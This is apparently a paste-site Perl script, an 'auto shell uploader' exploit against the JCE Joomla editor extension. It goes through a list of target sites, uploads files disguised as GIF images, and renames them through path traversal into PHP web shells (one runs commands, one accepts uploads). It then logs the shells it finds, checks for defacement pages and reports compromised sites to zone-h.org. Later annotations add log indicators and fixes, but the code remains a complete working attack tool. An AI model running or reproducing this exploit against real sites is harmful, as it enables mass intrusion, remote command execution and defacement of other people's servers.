elzindyanii340

[perl] com_jce

Jul 6th, 2017
  1. #!/usr/bin/perl
  2. #coded by el ZinDYanII-tN (2013-2014)
  3. #free toolZ
  4. use Socket;
  5. use IO::Socket;
  6. use IO::Socket::INET;
  7. use LWP::UserAgent;
  8. use Term::ANSIColor;
  9. use HTTP::Request::Common qw(POST);
  10. use HTTP::Request::Common qw(GET);
  # Operator-side setup: build the shared HTTP client, print the banner, and
  # read the target(s) from the command line.
  # The User-Agent below is a fixed, very old Gecko string; the same literal is
  # also sent by the raw-socket requests later in the file, so it can be
  # searched for in web-server access logs.
  11. $ag = LWP::UserAgent->new();
  12. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  13. $ag->timeout(10);
  # Runs the shell command `cls` to clear the console.
  14. system('cls');
  15. print "*******************************************************************************","\n";
  16. print "************************[ Coded By el ZinDYanII-tN ]***************************","\n";
  17. print "*******************************************************************************","\n";
  18.  
  # $banner is assigned a string holding only a newline; nothing in the visible
  # code reads it afterwards.
  19. $banner = ('
  20. ');
  21. print ("\n    .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n");
  22. print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
  23.  
  24. print "    d88b  .o88b. d88888b      d88888b db    db  .o88b. db   dD d88888b d8888b. ","\n";
  25. print "    `8P' d8P  Y8 88'          88'     88    88 d8P  Y8 88 ,8P' 88'     88  `8D ","\n";
  26. print "     88  8P      88ooooo      88ooo   88    88 8P      88,8P   88ooooo 88oobY' ","\n";
  27. print "     88  8b      88~~~~~      88~~~   88    88 8b      88`8b   88~~~~~ 88`8b   ","\n";
  28. print " db. 88  Y8b  d8 88.          88      88b  d88 Y8b  d8 88 `88. 88.     88 `88. ","\n";
  29. print " Y8888P   `Y88P' Y88888P      YP      ~Y8888P'  `Y88P' YP   YD Y88888P 88   YD ","\n\n";
  30. print "                 |-> Facebook  :   www.facebook.com/XelzindyaniiX               ";                                                            
  31. print "     Contact me -|                               or                             ";                                                            
  32. print "                 |-> Email     :    elzindyanii340[@]gmail.com                  ";                                                            
  33. print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";                                                                              
  34.  
  # If $0 contains a backslash, keep only the part after the last one as the
  # script name ($a); otherwise use $0 unchanged. $a is used in the usage text
  # and the console title.
  35. if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
  36.  
  # No argument at all: print usage and stop.
  37. if(!defined($ARGV[0])) { print "\n How To Use => $a lista.txt ou $a -s www.site.com \n"; exit; }
  38.  
  # Two input modes:
  #   -s HOST  -> @TXT holds the single target from $ARGV[1]
  #   FILE     -> @TXT holds every line of the file named in $ARGV[0]
  # The file is opened with two-argument open on a bareword handle and the
  # result is not checked, so an unreadable file leaves @TXT empty.
  39. $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
  40. if(!defined($ARGV[1])) { print "\n\nHow To Use => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
  41. }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
  # $tx is the number of target entries; it is shown in the console title.
  42. $tx = $#TXT+1;
  43. print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
  44.  
  # Counters for accepted / rejected zone-h.org submissions.
  45. $ok = '0'; $erro = '0';
  # Main loop, one pass per target entry. Each pass probes for the JCE image
  # manager endpoint, uploads content under a .gif name, asks the plugin to
  # rename that file to a list of other paths, and then fetches a fixed set of
  # URLs to see what is reachable.
  # Indicators for site owners, all taken from literals in this block: the two
  # request paths in $script/$up, the static User-Agent, the fixed multipart
  # boundary, upload names arti*/not*/plas*/gligie*/tir* with a .gif suffix, the
  # file names xk.txt, xh.txt, ck.htm, x.html, xxx.php, xxu.php, and the two
  # marker strings that appear in $cont and in the final content check.
  # NOTE(review): the server-side remedies are an updated JCE, rejecting rename
  # requests that change a file's extension or contain "../", and not executing
  # PHP from upload directories - confirm against the deployed configuration.
  46. site: foreach(@TXT){ chomp(my $site = $_);
  # $cm: optional path component under the host; $porra: per-target counter that
  # is appended to upload names.
  47. $cm=''; $porra = '0';
  # Normalise the entry: drop a leading http:// or https:// and split what is
  # left into host ($site) and the last path component ($cm). The first pattern
  # that matches wins; an entry with no slash at all is left unchanged.
  48. if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  49. }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  50. }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  51. }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  52. }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
  53. }elsif($site =~ /http:\/\/(.*)/){$site = $1;
  54. }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
  55. }elsif($site =~ /https:\/\/(.*)/){$site = $1;
  56. }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
  57. }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
  58. }elsif($site =~ /(.*)\//){$site = $1;}
  59.  
  # Scheme and port are fixed to http / 80 for every target, including entries
  # that were given as https://, so all requests below are cleartext HTTP.
  60. $http = 'http://'; $porta = "80";
  61.  
  # The two com_jce imgmanager request paths used below. Both query strings are
  # constants, including the 32-hex-character parameter name/value pair in $up,
  # which makes them usable as access-log or WAF match strings.
  62. $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
  63. $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
  64.  
  65. print "\n>> $site ->";
  66. $cs++;
  # Sets the console title through the shell `title` command; the script name,
  # the input argument and the counters are interpolated into the command string.
  67. system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~  ERRO ($erro) ]";
  68. ############################################### Packet 1 --> checking misses
  # When the target entry had a path component, prefix both request paths with it.
  69. if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
  70.  
  # Probe: GET the imgmanager page and skip this target unless the body contains
  # one of three markers (multipart/form-data, hastip, /plugins/editors/jce/).
  71. $pageURL= "$http"."$site"."$script";
  72. $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
  73. $get = $getp->content;
  74. if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
  75.  
  # Destination paths handed to the rename request further down. Every entry
  # starts with "../", and several end in .php.
  # NOTE(review): presumably resolved relative to the plugin's upload directory;
  # not visible from this file.
  76. my @index = (
  77. '../../xk.txt',
  78. '../../xh.txt',
  79. '../../ck.htm',
  80. '../../tmp/x.html',
  81. '../../cache/x.html',
  82. '../x.html',
  83. '../../tmp/ck.htm',
  84. '../../cache/ck.htm',
  85. '../ck.htm',
  86. '../xxx.php',
  87. '../xxu.php');
  88.  
  # Extra destinations one directory higher when the site lives in a subdirectory.
  89. if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
  90.  
  91. push(@index,'../../x.php','../../x.php');
  92.  
  # For every destination: pick an upload name and file content, upload it as a
  # .gif, then request the rename to the destination path.
  93. foreach(@index){
  94. chomp(my $indx = $_);
  95. $porra++;
  96.  
  # Upload name ($narq) and file content ($cont) are chosen by substring match
  # on the destination. $narq and $cont are globals, so a destination matching
  # none of the patterns reuses the values set by an earlier iteration. No entry
  # in @index contains "configuration" or "index", so those alternatives never
  # match here.
  97. if($indx =~ /xk/){ $narq = 'arti'."$porra";
  98. $cont  = 'Invasão feita por Renatinho';}
  99.  
  100. if($indx =~ /xh/){ $narq = 'not'."$porra";
  101. $cont  = 'Invasão feita por Renatinho';}
  102.  
  103. if($indx =~ /configuration/){ $narq = 'clor'."$porra";
  104. $cont  = 'Invasão feita por Renatinho<?php exit;?>';}
  105.  
  106. if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
  107. $cont  = 'Invasão feita por Renatinho';}
  108.  
  # For the two .php destinations the content starts with the GIF89a magic bytes
  # followed by PHP code: a command-execution web shell for xxx, a file-upload
  # handler for xxu. A file that begins with GIF89a and also contains "<?php" is
  # a scanning signature for upload directories.
  109. if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
  110. $cont  = 'GIF89a
  111. <?php system("$_GET[cmd]"); exit; ?>';}
  112.  
  113. if($indx =~ /xxu/){ $narq = 'tir'."$porra";
  114. $cont  = 'GIF89a u
  115. <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
  116.  
  117.  
  # Echo destination, upload name and content to the operator's console.
  118. print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
  119.  
  120.  
  121. ############################################### Packet 2 --> Leveling as a. Gif
  # Raw-socket POST to $up with a multipart/form-data body that submits $cont as
  # "<narq>.gif" with Content-Type image/gif. If the connection fails the script
  # moves on to the next target. The response is not read before the socket is
  # closed.
  # Network-level indicators: the boundary string and the Content-Length value
  # are constants, and header lines end in a bare LF rather than CRLF.
  122. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  123. print $remote "POST $up HTTP/1.1"."\n";
  124. print $remote "Host: $site"."\n";
  125. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  126. print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
  127. print $remote "Content-Length: 769"."\n\n";
  128. print $remote "-----------------------------41184676334"."\n";
  129. print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
  130. print $remote '/'."\n";
  131. print $remote "-----------------------------41184676334"."\n";
  132. print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
  133. print $remote 'Content-Type: application/octet-stream'."\n\n\n";
  134. print $remote "-----------------------------41184676334"."\n";
  135. print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
  136. print $remote "0"."\n";
  137. print $remote "-----------------------------41184676334"."\n";
  138. print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
  139. print $remote 'Content-Type: image/gif'."\n\n";
  140. print $remote "$cont"."\n";
  141. print $remote "-----------------------------41184676334"."\n";
  142. print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
  143. print $remote "$narq"."\n";
  144. print $remote "-----------------------------41184676334"."\n";
  145. print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
  146. print $remote 'upload'."\n";
  147. print $remote "-----------------------------41184676334--"."\n\n";
  148. close($remote);
  149.  
  150. ############################################### Packet 3 --> Gif to Php
  # Second raw-socket POST, this time to $script, carrying a JSON call to the
  # plugin's "folderRename" function with the uploaded "<narq>.gif" as source
  # and the current @index entry as destination. This is the step that changes
  # the extension and moves the file out of the upload location. Log signature:
  # a POST body starting with json={"fn":"folderRename" together with the header
  # "X-Request: JSON". The server's reply is printed to the console.
  151. $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  152. $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
  153. print $remote "POST $script HTTP/1.1"."\n";
  154. print $remote "Host: $site"."\n";
  155. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  156. print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
  157. print $remote 'X-Request: JSON'."\n";
  158. print $remote "Content-Length: ".length($json).""."\n\n";
  159. print $remote "$json"."\n\n";
  160. while(<$remote>){print "$_";}
  161. close($remote);
  162. }
  163. ############################################### Packet 4 --> Checking resulta upload
  # Fetch the two .php paths under /images/ (and under the subdirectory, if any).
  # A response body containing GIF89a is treated as a hit and the URL is appended
  # to SH.txt in the operator's working directory.
  164. my @xxx=('/images/xxu.php','/images/xxx.php');
  165. if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
  166. foreach(@xxx){
  167. $shc = 'http://'."$site"."$_";
  168. my $resc=$ag->request(HTTP::Request->new(GET => $shc));
  169. $respc = $resc->content;
  170. if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
  171.  
  # Candidate URLs checked for a defacement marker: the site root, the text/html
  # file names used above, and the tmp/, cache/ and images/ directories.
  172. my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
  173. if($cm){
  174. push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
  175.  
  # For the first URL whose body contains the string "el ZinDYanII-tN": submit it
  # to the zone-h.org notify form over a raw HTTP/1.0 POST, count the result as
  # OK or ERRO depending on whether the reply contains "ERROR:", append the URL
  # to HCKDS.txt, and move to the next target. The marker searched for here is a
  # different string from the text placed in $cont above; both are worth
  # searching for in a web root during incident response.
  176. foreach(@indxs){ chomp(my $iind = $_);
  177.  
  178. $urst = 'http://'."$site"."$iind";
  179. my $res=$ag->request(HTTP::Request->new(GET => $urst));
  180. $resp = $res->content;
  181. if($resp =~ m/el ZinDYanII-tN/g){ $sthckd = "$site"."$iind";
  182. $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
  183. print $sockz "POST /notify/single HTTP/1.0\r\n";
  184. print $sockz "Accept: */*\r\n";
  185. print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
  186. print $sockz "Accept-Language: pt-br\r\n";
  187. print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
  188. print $sockz "Connection: Keep-Alive\r\n";
  189. print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
  190. print $sockz "Host: www.zone-h.org\r\n";
  191. $length=length("defacer=el%20ZinDYanII-tN&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
  192. print $sockz "Content-Length: $length\r\n";
  193. print $sockz "Pragma: no-cache\r\n";
  194. print $sockz "\r\n";
  195. print $sockz "defacer=el%20ZinDYanII-tN&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
  196. $zn = join('',<$sockz>);
  197. if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
  198. close($sockz);
  199. open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
  200. $sthckd = ''; $hk++; next site;}
  201. } }
  202.  
  # End-of-run summary. Counters that are still unset or false are normalised to
  # 0; the totals line is printed only when at least one target was counted in
  # $hk by the marker check in the main loop.
  203. if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
  204. if($hk){
  205. print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}